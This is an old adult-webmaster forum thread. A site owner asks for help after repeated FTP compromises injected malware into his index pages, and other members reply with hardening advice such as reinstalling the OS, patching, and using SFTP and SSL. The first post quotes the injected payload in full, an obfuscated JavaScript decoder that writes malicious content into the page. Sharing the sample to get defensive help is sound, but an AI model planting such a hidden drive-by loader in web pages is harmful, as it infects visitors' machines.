![]() |
![]() |
![]() |
||||
Welcome to the GoFuckYourself.com - Adult Webmaster Forum forums. You are currently viewing our boards as a guest which gives you limited access to view most discussions and access our other features. By joining our free community you will have access to post topics, communicate privately with other members (PM), respond to polls, upload content and access many other special features. Registration is fast, simple and absolutely free so please, join our community today! If you have any problems with the registration process or your account login, please contact us. |
|
New Webmasters ask "How-To" questions here. This is where other fucking Webmasters help. |
|
Thread Tools |
![]() |
#1 |
Registered User
Join Date: Dec 2006
Posts: 5
|
server hacked! Need help please...
Hey guys
Im hoping someone can help me here with a problem i am having on a couple of my member sites being hacked. Someone is managing to hack into my FTP server and inbedding a hidden remote file which is inserting malicious codes on my index page, that contain viruses via external url's. So anyone who reaches my index pages is hit with a trojan detection through there firewall! The code which gets inbedded is always at the bottom of the index source code and it looks like this: <script language="JavaScript">e = '0x00' + '5F';str1 = "%E4%BC%B7%AA%C0%AD%AC%A7%B4%BB%E3%FE%AA%B7%AD%B7% BE%B7%B4%B7%AC%A7%E6%B8%B7%BC%BC%BB%B2%FE%E2%E4%B7 %BA%AE%BF%B3%BB%C0%AD%AE%BD%E3%FE%B8%AC%AC%B0%E6%F 1%F1%A9%BB%AC%AE%B7%BD%B2%AC%F2%B7%B2%BA%B1%F1%B4% BC%F1%AB%B0%B4%EF%F1%FE%C0%A9%B7%BC%AC%B8%E3%EF%C0 %B8%BB%B7%B9%B8%AC%E3%EF%E2%E4%F1%B7%BA%AE%BF%B3%B B%E2%E4%F1%BC%B7%AA%E2";str=tmp='';for(i=0;i<str1. length;i+=3){tmp =unescape(str1.slice(i,i+3));str=str+String.fromCh arCode((tmp.charCodeAt(0)^e)-127);}document.write(str);</script> When i upload my local clean copy of the index page it was over writing the infected file and he would pop up again with this code every 1 - 2 weeks. The only further solution i have managed to find so far is to restrict FTP access from anywhere other than my local IP. Then we managed to detect this guy is in Russia and was accessing the remote file without using FTP and we banned all IP's from Russia! However i fear this is only a temporary solution as he can figure this out and spoof his IP address. Anyone have any ideas what else i can do to keep this ass hole away?? |
![]() |
![]() ![]() ![]() ![]() |
![]() |
#2 |
Confirmed User
Join Date: Jan 2006
Posts: 1,080
|
Contact info?
|
![]() |
![]() ![]() ![]() ![]() |
![]() |
#3 |
Too lazy to set a custom title
Industry Role:
Join Date: Jun 2005
Location: 127.0.0.1
Posts: 27,047
|
i think some else had the same issue some weeks ago... try searching gfy's history a bit...
__________________
Make Money
|
![]() |
![]() ![]() ![]() ![]() |
![]() |
#4 |
Too lazy to set a custom title
Industry Role:
Join Date: Jun 2005
Location: 127.0.0.1
Posts: 27,047
|
edit: sorry wrong link...
ignore this...
__________________
Make Money
|
![]() |
![]() ![]() ![]() ![]() |
![]() |
#5 |
Confirmed User
Join Date: Aug 2002
Posts: 1,888
|
Check to see if there is a .htaccess file which is adding a header/footer. Contact your host to figure out which one of your scripts/passwords are insecure.
__________________
I do things skype:themodF |
![]() |
![]() ![]() ![]() ![]() |
![]() |
#6 |
beep
Industry Role:
Join Date: Nov 2005
Location: West Coast
Posts: 236
|
When a server has been comprised, you *must* reformat the drive and reload the OS. There is no other way to be 100% certain that you've closed all of the backdoors the attacker may have setup.
Once you have the OS reinstalled, here are a couple of security tips to prevent this from happening in the future: * Run security updates on a daily basis. With Debian-derived systems, this is as simple as 'aptitude update && aptitude upgrade'. Don't forget any custom-installed scripts when you're doing this! For instance, if you run something like ComusThumbs or ArrowTrader, be sure to regularly check their home pages for security announcements. * Never use any unencrypted services for authentication. You mentioned FTP; anyone can sniff the network traffic and grab your FTP password. Use scp or SFTP instead. The same goes for e-mail: use TLS or SSL SMTP connections for sending mail, and SSL POP or IMAP for receiving it. If you have any web-based control panels, make sure they run over HTTPS, not HTTP. And of course, *never* use telnet to remote-connect. Personally, on each of my dedicated boxes, the first thing I do is uninstall the unencrypted versions of every server except HTTP and SMTP; it makes it much easier to be certain that all users are using secure logins when things like FTP and POP3 aren't even available ![]() Anyway, good luck get your server back online!
__________________
JustPicsPlease - Search millions of porn pics (Or thousands of porn tubes, if that's your style.) Both sites are desktop- and mobile-friendly. |
![]() |
![]() ![]() ![]() ![]() |